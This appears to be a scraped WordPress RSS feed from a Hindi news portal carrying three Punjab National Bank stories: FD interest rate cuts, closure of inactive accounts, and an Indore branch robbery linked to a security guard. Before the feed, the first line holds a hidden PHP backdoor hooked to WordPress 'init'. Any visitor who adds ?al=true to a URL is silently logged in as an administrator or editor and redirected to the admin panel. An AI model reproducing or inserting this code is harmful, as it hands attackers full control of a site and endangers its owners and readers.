// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Punjab National Bank – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 03 May 2025 12:06:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 पंजाब नेशनल बैंक ने फिर से एफडी पर ब्याज दरें घटा दी https://pratyushaashakinayikiran.com/?p=153521 Sat, 03 May 2025 12:06:00 +0000 https://pratyushaashakinayikiran.com/?p=153521 नई दिल्ली
 पंजाब नेशनल बैंक (PNB) ने फिर से अपनी फिक्स्ड डिपॉजिट (FD) की ब्याज दरों में बदलाव किया है। यह बदलाव 3 करोड़ रुपये से कम की एफडी पर किया गया है। बैंक ने अप्रैल 2025 में भी ऐसा ही बदलाव किया था। इस बार, बैंक ने कुछ खास समय वाली एफडी पर ब्याज दरों को 25 बेसिस पॉइंट्स तक घटा दिया है। नई दरें 1 मई, 2025 से लागू हो गई हैं।

ब्याज दरों में बदलाव के बाद पंजाब नेशनल बैंक आम नागरिकों को 7 दिनों से लेकर 10 साल तक की एफडी पर 3.50% से 7.10% तक ब्याज दे रहा है। सबसे ज्यादा ब्याज दर 390 दिनों की एफडी पर मिल रही है। यह 7.10% है।

किसके लिए कितनी दर?

पीएनबी ने आम नागरिकों के लिए 3 करोड़ रुपये से कम की जमा पर ब्याज दरें कम की गई हैं। 180 से 270 दिनों की एफडी पर ब्याज दर 6.25% से घटाकर 6% कर दी गई है। इसी तरह, 271 से 299 दिनों की एफडी पर ब्याज दर 6.5% से घटाकर 6.25% कर दी गई है।

303 दिनों की FD पर ब्याज दर 6.4% से घटाकर 6.15% कर दी गई है। 304 दिनों से लेकर 1 साल से कम की FD पर ब्याज दर अब 6.5% की जगह 6.25% होगी। 1 साल की FD पर ब्याज दर 6.8% से घटाकर 6.7% कर दी गई है।

सीनियर सिटिजंस के दर

60 साल से ऊपर और 80 साल से कम उम्र के वरिष्ठ नागरिकों को 5 साल तक की एफडी पर 50 बेसिस पॉइंट्स ज्यादा ब्याज मिलेगा। 5 साल से ज्यादा की एफडी पर उन्हें 80 बेसिस पॉइंट ज्यादा ब्याज मिलेगा। यह नियम 3 करोड़ रुपये से कम की जमा पर लागू होगा। वरिष्ठ नागरिकों को अब 4.00% से 7.60% तक ब्याज मिलेगा।

वहीं 80 साल या उससे ज्यादा उम्र के सुपर सीनियर नागरिकों को सभी तरह की एफडी पर 80 बेसिस पॉइंट ज्यादा ब्याज मिलेगा। बदलाव के बाद, सुपर सीनियर नागरिकों को 4.30% से 7.90% तक ब्याज मिलेगा।

इस बैंक ने भी किया बदलाव

बंधन बैंक ने भी 3 करोड़ रुपये से कम की FD पर ब्याज दरों में बदलाव किया है। अब यह बैंक आम नागरिकों को 7 दिनों से लेकर 10 साल तक की FD पर 3% से 7.75% तक ब्याज देगा। वरिष्ठ नागरिकों को 3.75% से 8.25% तक ब्याज मिलेगा। सबसे ज्यादा ब्याज दर, जो कि 7.75% और 8.25% है, 1 साल की एफडी पर मिल रही है। नई दरें 1 मई, 2025 से लागू हो गई हैं।

]]>
PNB बैंक में है आपका भी अकाउंट, तो फटाफट करें ये काम, नहीं तो बंद हो जाएगा खाता! https://pratyushaashakinayikiran.com/?p=73954 Mon, 23 Sep 2024 15:38:00 +0000 https://pratyushaashakinayikiran.com/?p=73954 नई दिल्ली

अगर आपका अकाउंट भी पंजाब नेशनल बैंक (PNB Bank)में है, तो फिर ये खबर आपके लिए बेहद जरूरी है. दरअसल, पीएनबी की ओर से ऐसे ग्राहकों या अकाउंट होल्डर्स को फिर से अलर्ट जारी किया गया है, जिनके खाते में बीते दो साल से ज्यादा समय से कोई ट्रांजैक्शन नहीं हुआ है और इन अकाउंट में बैलेंस जीरो है. बैंक की ओर से सोशल मीडिया (Social Media) प्लेटफॉर्म ट्विटर (अब एक्स) पर पोस्ट के जरिए कहा गया है कि ऐसे खातों को को बंद कर दिया जाएगा. ऐसे में अगर आपने भी अपने PNB Account में 3 साल से लेन-देन नहीं किया है, तो फिर जल्द से जल्द ये काम कर लें. इए जानते हैं बैंक की ओर से क्या कहा गया है?

सोशल मीडिया के जरिए किया अलर्ट
PNB ने अपने ट्विटर (अब X) अकाउंट पर एक अलर्ट जारी कर कहा है कि 'महत्वपूर्ण सूचना, अगर दो वर्ष से अधिक समय तक कस्टमर अकाउंट में कोई ट्रांजैक्शन नहीं होता है, तो खाता निष्क्रिय (Inoperative) हो जाएगा. कृपया अपने अकाउंट में लेन-देन सुनिश्चित करें, ताकि यह निष्क्रिय न हो.' इससे पहले भी कई बार बैंक की ओर से ग्राहकों को इसके लिए अलर्ट किया जा चुका है. हालांकि, इस बार बैंक की ओर से कोई डेडलाइन सेट नहीं की गई है.

   
कई बार ग्राहकों को दी गई चेतावनी
पंजाब नेशनल बैंक ने देखा है कि कई अकाउंट में बीते दो-तीन सालों से ग्राहक द्वारा किसी तरह का कोई ट्रांजैक्शन नहीं किया गया है और इनमें कोई बैलेंस भी नहीं है. ऐसे में इन खातों के दुरुपयोग को रोकने के लिए उठाए जाने वाले कदम के तहत इन्हें क्लोज करने का फैसला किया गया है. इस संबंध में बैंक की ओर से ग्राहकों को कई बार चेतावनी जारी की गई है, लेकिन इसके बावजूद अभी काफी ऐसे अकाउंट हैं, जिनमें कोई ट्रांजैक्शंस नहीं हुआ है, जिसके चलते बैंक ने एक बार फिर अलर्ट भेजा है.

यहां बता दें कि बीते 1 मई 2024, 16 मई 2024, 24 मई 2024, 1 जून 2024 और 30 जून 2024 को वेबसाइट और सोशल मीडिया (Social Media) के माध्यम से इसकी जानकारी शेयर कर चुका है. ऐसे सभी ग्राहकों को इस असुविधा से बचने के लिए जल्द से जल्द अपने अकाउंट को सक्रिय करना होगा.

इन खातों को नहीं किया जाएगा बंद
पंजाब नेशनल बैंक ने पहले ही साफ कर दिया था कि इस तरह के सभी अकाउंट्स को बिना किसी नोटिस के बंद कर दिया जाएगा. हालांकि, ऐसे अकाउंट्स जो कि डीमैट खातों (Demat Accounts) से लिंक्ड हैं, उन्हें बंद नहीं किया जाएगा. वहीं 25 वर्ष से कम उम्र के ग्राहक वाले स्टूडेंट अकाउंट्स, नाबालिगों के खाते, SSY/PMJJBY/PMSBY/APY जैसी स्कीम्स के लिए खोले गए खातों को भी सस्पेंड नहीं किया जाएगा.

अकाउंट सक्रिय करने के लिए ये काम जरूरी
बैंक की ओर से ग्राहकों को चेतावनी के साथ ही यह सुविधा भी दी गई है कि अगर अपने अकाउंट से संबंधित किसी भी तरह की जानकारी चाहते हैं, या फिर कोई असिस्टेंस लेना चाहते हैं, तो फिर सीधे अपनी बैंक ब्रांच में जाकर संपर्क कर सकते हैं. PNB के मुताबिक, ऐसे खातों को फिर से सक्रिय तब तक नहीं किया जा सकता है, जब तक कि संबंधित ब्रांच में अकाउंट होल्डर अपने खाते सी केवाईसी (KYC) से जुड़े सभी जरूरी दस्तावेज जमा नहीं कराता. यानी अगर आप अपने अकाउंट को एक्टिव रखना चाहते हैं तो बैंक ब्रांच जाकर KYC तुरंत करा लें.

आज क्या है PNB Share का हाल?
पंजाब नेशनल बैंक पब्लिक सेक्टर का दूसरा सबसे बड़ा बैंक है और इसका मार्केट कैपिटलाइजेशन 1.22 लाख करोड़ रुपये है. इस बैंक के शेयरों (PNB Shares) की बात करें तो ये लगातार तेजी के साथ आगे बढ़ रहा है. सप्ताह के पहले कारोबारी दिन सोमवार को ये 108.59 रुपये के लेवल पर ओपन हुआ और करीह 3 फीसदी की तेजी लेते हुए 111.42 रुपये के स्तर पर पहुंच गया.

 

]]>
इंदौर बैंक लूट में गार्ड की मिलीभगत के सबूत, सीसीटीवी फुटेज में वही नकाब-रेनकोट पहने दिखा https://pratyushaashakinayikiran.com/?p=52236 Wed, 17 Jul 2024 14:26:00 +0000 https://pratyushaashakinayikiran.com/?p=52236 इंदौर

 मध्य प्रदेश (Madhya Pradesh) के इंदौर (Indore) में विजयनगर स्थित स्कीम नंबर 54 में मौजूद पंजाब नेशनल बैंक (Punjab National Bank) में दिनदहाड़े लूट हुई. मुंह पर नकाब और रेनकोट पहनकर बदमाश पहुंचा था. रेनकोट में नकाबपोश एक बदमाश ने कैशियर पर फायर किया. फिल्मी अंदाज में बदमाशों ने पहले फायर किया, फिर बैंककर्मी से कहा कि बैग में पैसे भर दो.. घटना में बदमाशों ने कुल सात लाख रुपये की लूट की.

इंदौर की पंजाब नेशनल बैंक में डकैती में सिक्योरिटी गार्ड के ही शामिल होने के सबूत मिले हैं। पुलिस को सीसीटीवी कैमरे से गार्ड के फुटेज मिले हैं। इसमें गार्ड वही नकाब और रेनकोट पहने दिखा है, जो वारदात के वक्त लुटेरे ने पहन रखे थे।

सूत्रों के मुताबिक, गार्ड को हिरासत में ले लिया गया। हालांकि, पुलिस ने इसकी आधिकारिक पुष्टि नहीं की है। पुलिस जल्द ही प्रेस कॉन्फ्रेंस कर मामले का खुलासा करेगी।

इंदौर के स्कीम नंबर 54 में मंगलवार शाम करीब 4.30 बजे PNB से एक बदमाश 6 लाख 64 हजार रुपए लूट ले गया था। मुंह पर नकाब और रेनकोट पहने बदमाश ने बैंक के अंदर घुसकर 315 बोर की बंदूक से हवाई फायर किया। इसके बाद कैश काउंटर पर बैठी महिला कर्मचारी से बैग में रुपए भरवाए और भाग निकला था।

12 बोर की बंदूक से की फायरिंग

बदमाशों ने बैंक में लूट की घटना को अंजाम देने के लिए खास 12 बोर बंदूक का इस्तेमाल किया. फायरिंग में गोली से काउंटर पर बैठी महिला कैशियर बाल-बाल बच गई. घटना की जानकारी मिलने के तुरंत बाद वरिष्ठ अधिकारी मौके पर पहुंच गए. पुलिस अधिकारी फिलहाल सीसीटीवी खंगाल रहे हैं.

सीसीटीवी में नजर आया आरोपी

पंजाब बैंक में लूट की वारदात अंजाम देने आया लुटेरा रेन कोट पहन रखा था. आरोपी सीसीटीवी में भी कैद हुआ. विजय नगर पुलिस थाना क्षेत्र के एसीपी के एल चंनदानी ने बताया कि बैंक में 6 लाख  64 हजार  की लूट हुई. आरोपी का कुछ इनपुट पुलिस को मिला, जिसकी जांच की जा रही है. संभावना है कि जल्द आरोपी को पुलिस गिरफ्तार कर लेगी. उन्होंने बताया कि पंजाब नेशनल बैंक में कोई भी सिक्योरिटी गार्ड मौजूद नहीं था. क्योंकि बैंक की पॉलिसी है कि वह जहां चाहता है, वहीं सिक्योरिटी गार्ड तैनात करता है.

बाइक के नंबर से किया ट्रेस

लूट के बाद पुलिस की अलग-अलग टीमें शहर में लगे सीसीटीवी फुटेज खंगाल रही थीं। मौका-ए-वारदात पर एक्टिव मोबाइल नंबर और कॉल डिटेल की भी जांच की जा रही थी। इसी दौरान एक सीसीटीवी फुटेज में लुटेरा दिखाई दिया। बाइक नंबर से ट्रेस करने पर वह निरंजनपुर होता हुआ पीछे के रास्ते हीरा नगर इलाके में घुसा। यहां से श्याम नगर होते हुए एक मकान में पहुंचा।

यह मकान बैंक में ही सिक्योरिटी गार्ड अरुण सिंह का निकला।
बाइक पार्क करने के बाद बदमाश बैंक पहुंचा। सीसीटीवी में दिख रहा है कि उसने रेनकोट पहना है और मुंह पर नकाब लगाया है। उसके हाथ में 315 बोर की बंदूक थी।

बाइक पार्क करने के बाद बदमाश बैंक पहुंचा। सीसीटीवी में दिख रहा है कि उसने रेनकोट पहना है और मुंह पर नकाब लगाया है। उसके हाथ में 315 बोर की बंदूक थी।

फुटेज में देखकर पत्नी ने की शिनाख्त

डीसीपी जोन-2 अभिनव विश्वकर्मा की टीम गार्ड अरुण सिंह के घर तक पहुंची। वह मूल रूप से उत्तर प्रदेश का रहने वाला है। फिलहाल, हीरा नगर थाना क्षेत्र के ​श्याम नगर में रहता है। पुलिस को उसके घर से बैंक तक जाने और बैंक से घर आने तक के फुटेज मिले हैं।

पुलिस जब उसके घर पहुंची तो पत्नी को ग्रीन कलर की बाइक, नकाब और रेनकोट पहने फुटेज दिखाए। पत्नी ने फुटेज में अरुण के होने की पुष्टि की।

पुलिस सूत्रों के मुताबिक, मामले में एक अन्य बैंक कर्मचारी की भूमिका भी संदिग्ध बताई जा रही है। बताया गया है कि अरुण उसके संपर्क में था। अफसर जल्द इस मामले में खुलासा करेंगे।

बदमाश ने बैंक के अंदर पहुंचते ही हवाई फायर कर दहशत फैलाई। कैश काउंटर पर बैठी महिला कर्मचारी से बैग में रुपए भरने को कहा। इसके बाद बैग लेकर फरार हो गया।

 

]]>